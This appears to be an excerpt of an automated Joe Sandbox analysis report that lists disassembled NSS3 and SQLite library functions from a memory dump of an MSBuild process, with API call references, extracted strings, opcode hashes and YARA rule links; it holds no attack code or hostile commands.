                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Enter$Leave
                                                                                        • String ID:
                                                                                        • API String ID: 2801635615-0
                                                                                        • Opcode ID: bbd63d112d31ee0ad65f0b463ebda31d15103897aabc78ed00956f29f3b37796
                                                                                        • Instruction ID: 142c85e5bad7f076980dab2e1af690f7ecb388e7018e76c43561d47b88e01398
                                                                                        • Opcode Fuzzy Hash: bbd63d112d31ee0ad65f0b463ebda31d15103897aabc78ed00956f29f3b37796
                                                                                        • Instruction Fuzzy Hash: 48F1B032B112148BDB05AF60E98DAAA3731BF4B325F29417DD80657A01CB3DE981DFD6
                                                                                        Function 6C752D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_initialize.NSS3 ref: 6C752D9F
                                                                                          • Part of subcall function 6C60CA30: EnterCriticalSection.KERNEL32(?,?,?,6C66F9C9,?,6C66F4DA,6C66F9C9,?,?,6C63369A), ref: 6C60CA7A
                                                                                          • Part of subcall function 6C60CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C60CB26
                                                                                        • sqlite3_exec.NSS3(?,?,6C752F70,?,?), ref: 6C752DF9
                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C752E2C
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E3A
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E52
                                                                                        • sqlite3_mprintf.NSS3(6C7BAAF9,?), ref: 6C752E62
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E70
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752E89
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752EBB
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752ECB
                                                                                        • sqlite3_free.NSS3(00000000), ref: 6C752F3E
                                                                                        • sqlite3_free.NSS3(?), ref: 6C752F4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1957633107-0
                                                                                        • Opcode ID: 14c58a66911de30f3b52e53a6b36a8944abc5c59089c640af8201d8c39f2b25c
                                                                                        • Instruction ID: 5d5b390e838190239336ccfd1bf97df3d75b6bed7e6cfd27ec6a9bc92b6cca99
                                                                                        • Opcode Fuzzy Hash: 14c58a66911de30f3b52e53a6b36a8944abc5c59089c640af8201d8c39f2b25c
                                                                                        • Instruction Fuzzy Hash: 886190B5E002059BEB00CF68D989B9EB7B6EF49348F544038DC15A7741EB31EC65CBA5
                                                                                        Function 6C604C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D11
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D2A
                                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D4A
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D57
                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604D97
                                                                                        • PR_Lock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DBA
                                                                                        • PR_WaitCondVar.NSS3 ref: 6C604DD4
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DE6
                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                        • String ID:
                                                                                        • API String ID: 3388019835-0
                                                                                        • Opcode ID: 0f0b8d8893bf145448c522f18bcf5e382a22ba5aa5ce1c05b1b080fa3f68cf0d
                                                                                        • Instruction ID: 55e9934a2c222f6f34eda1f475d8aebd1a9dbcfbdd303bcde61bf68011078f9b
                                                                                        • Opcode Fuzzy Hash: 0f0b8d8893bf145448c522f18bcf5e382a22ba5aa5ce1c05b1b080fa3f68cf0d
                                                                                        • Instruction Fuzzy Hash: 2941A0B2A04B15CFCB10AF78D28816977F4BF1A314F054679D848E7751EB70D894CB99
                                                                                        Function 6C606645 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 477stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_step.NSS3(?), ref: 6C6066CA
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C60673D
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6067B8
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C606A7A
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C606ADE
                                                                                        • sqlite3_errmsg.NSS3 ref: 6C606B80
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C606B93
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C606BB6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$memcpysqlite3_errmsgsqlite3_stepstrlen
                                                                                        • String ID: ($d
                                                                                        • API String ID: 2708504553-1915259565
                                                                                        • Opcode ID: d32ab483c6f78193b3b3543217371a49cb93cfc608b769340d244f83b8e9a852
                                                                                        • Instruction ID: 55c0d41977309506c06aeac7067bd30c2259ca0d52934f9efa341e49732cff6c
                                                                                        • Opcode Fuzzy Hash: d32ab483c6f78193b3b3543217371a49cb93cfc608b769340d244f83b8e9a852
                                                                                        • Instruction Fuzzy Hash: 3602BC71B042058BDB08CF69C6947AE77B1BF49318F244529DC4AFBB40DB35E885CBA9
                                                                                        Function 6C6A4E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6A4E90
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6A4EA9
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6A4EC6
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6A4EDF
                                                                                        • PL_HashTableLookup.NSS3 ref: 6C6A4EF8
                                                                                        • PR_Unlock.NSS3 ref: 6C6A4F05
                                                                                        • PR_Now.NSS3 ref: 6C6A4F13
                                                                                        • PR_Unlock.NSS3 ref: 6C6A4F3A
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                        • String ID: bUjl$bUjl
                                                                                        • API String ID: 326028414-3450169581
                                                                                        • Opcode ID: 4638e3ef1931e0a984b3d97283014c4312dc856005800f4592e667ce566065f3
                                                                                        • Instruction ID: 9f09bb3a12b7852af0ce0d6769290a653d55e4719ed0de9d3d91c95631e4070d
                                                                                        • Opcode Fuzzy Hash: 4638e3ef1931e0a984b3d97283014c4312dc856005800f4592e667ce566065f3
                                                                                        • Instruction Fuzzy Hash: F3414BB4A006059FCB00DF78C5848AABBF4FF49305B118569EC599B711EB30E895CB95
                                                                                        Function 6C6B6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_DigestInit), ref: 6C6B6C66
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6C94
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6CA3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B6CB9
                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B6CD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nyl
                                                                                        • API String ID: 1003633598-2245374282
                                                                                        • Opcode ID: d289dcd846c59b05624c4a6e6a89ed608e31c9f4670eb781bb294a8e36b05912
                                                                                        • Instruction ID: b3206297c3f8ebd4db9d088e3950a4fa3b8ee4ce7ba56b45902b2bcec2893dc2
                                                                                        • Opcode Fuzzy Hash: d289dcd846c59b05624c4a6e6a89ed608e31c9f4670eb781bb294a8e36b05912
                                                                                        • Instruction Fuzzy Hash: 5221F8326011099BDB44DB54EE8DB9E37B5EB4A319F044035E509EBB11DF30EA18CBAA
                                                                                        Function 6C6CECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C6CDE64), ref: 6C6CED0C
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CED22
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C6CED4A
                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C6CED6B
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6CED38
                                                                                          • Part of subcall function 6C604C70: TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
                                                                                          • Part of subcall function 6C604C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
                                                                                          • Part of subcall function 6C604C70: PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C6CED52
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6CED83
                                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6C6CED95
                                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6C6CED9D
                                                                                          • Part of subcall function 6C6E64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C6E127C,00000000,00000000,00000000), ref: 6C6E650E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                        • String ID: security
                                                                                        • API String ID: 3323615905-3315324353
                                                                                        • Opcode ID: 1cd428d155223e9970623e6d45899ac7e37f10972b76b58156aa304d633c90a8
                                                                                        • Instruction ID: 26463f0064c30f1e5b99beb5938bef2b393c0a749e0559dc1347070c08092ae6
                                                                                        • Opcode Fuzzy Hash: 1cd428d155223e9970623e6d45899ac7e37f10972b76b58156aa304d633c90a8
                                                                                        • Instruction Fuzzy Hash: 2E116D72A052186BD6205725AC46BBF72B8FF0670CF000835E80062E41FB20B60CC6EF
                                                                                        Function 6C6F4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C6F4DCB
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C6F4DE1
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C6F4DFF
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6F4E59
                                                                                          • Part of subcall function 6C6DFAB0: free.MOZGLUE(?,-00000001,?,?,6C67F673,00000000,00000000), ref: 6C6DFAC7
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7B300C,00000000), ref: 6C6F4EB8
                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C6F4EFF
                                                                                        • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C6F4F56
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F521A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                        • String ID:
                                                                                        • API String ID: 1025791883-0
                                                                                        • Opcode ID: f440ba8f4fc78864505f031f631068b8ca36709c14f3ea30abc9f25994da40f7
                                                                                        • Instruction ID: cd6453475adced8f94616042edeca1c43828f887b22e98b34df748f9a23904a8
                                                                                        • Opcode Fuzzy Hash: f440ba8f4fc78864505f031f631068b8ca36709c14f3ea30abc9f25994da40f7
                                                                                        • Instruction Fuzzy Hash: A7F1AE71E05209CFDB04CF54D8407ADB7B2BF85318F258129D925ABB81EB75ED82CB98
                                                                                        Function 6C622E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C622F3D
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C622FB9
                                                                                        • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C623005
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C6230EE
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C623131
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C623178
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memsetsqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 984749767-598938438
                                                                                        • Opcode ID: d7833e6cec52b7bf87c62d0b8ea8045690e9effe386d86dc16d20b82ce45d9c9
                                                                                        • Instruction ID: 66258ccdc52739bd29cc801d7ef0123211ddd015b48327cbe15e45213a053f4a
                                                                                        • Opcode Fuzzy Hash: d7833e6cec52b7bf87c62d0b8ea8045690e9effe386d86dc16d20b82ce45d9c9
                                                                                        • Instruction Fuzzy Hash: E2B19071E052199BCB18CF9DC889AEEF7B5BF48304F144029E845B7B41D7789941CFA9
                                                                                        Function 6C672D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: __allrem
                                                                                        • String ID: @yl$Pyl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$yl
                                                                                        • API String ID: 2933888876-3732613124
                                                                                        • Opcode ID: 8918ac5ca46dc110fd8446568dcea3d0517594c23ca81e214ed6fde92913e581
                                                                                        • Instruction ID: ddc0265b9eb2310d688b777a6885aeaac13a8f5906a2d98496ad10cf45ab69ff
                                                                                        • Opcode Fuzzy Hash: 8918ac5ca46dc110fd8446568dcea3d0517594c23ca81e214ed6fde92913e581
                                                                                        • Instruction Fuzzy Hash: 2461BF71B00205DFDB54CF68DC88AAA77B1FF49314F208A39E9159B780DB31AD06CBA5
                                                                                        Function 6C602400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C6024EC
                                                                                        • sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C602315), ref: 6C60254F
                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C602315), ref: 6C60256C
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C602566
                                                                                        • API called with finalized prepared statement, xrefs: 6C602543, 6C60254D
                                                                                        • bind on a busy prepared statement: [%s], xrefs: 6C6024E6
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6024F4, 6C602557
                                                                                        • misuse, xrefs: 6C602561
                                                                                        • API called with NULL prepared statement, xrefs: 6C60253C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
